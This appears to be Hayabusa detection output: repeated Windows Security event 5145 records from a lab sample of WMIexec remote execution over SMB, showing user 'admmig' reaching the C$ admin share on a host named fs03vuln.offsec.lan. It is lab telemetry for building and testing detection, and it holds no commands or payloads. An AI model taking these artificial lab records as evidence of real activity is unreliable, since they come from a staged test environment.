0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx 2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d | IP Addr: 10.23.23.9 | LID: 
0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b#\154acb6c70e2dddd2c94bf0bc748b8b7 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ifcaec084#\9d9142f584dbdd4e6d4bd7fd6f877b66 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Kd58820a5#\ba928c3b8a0cdac392162a6b572de29f | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.M870d558a#\1b67145a56e345e0d2e731357f498c1d | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Meefd589e#\e857b644c45626101624d874e1860701 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.780 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf5ac9168#\1b9aff98baffeed692a8e8768c0c4e47 | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#\2f732bd1dcfeef1bb935c1d1444abdef | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
2021-04-22 20:32:29.796 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mff1be75b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx
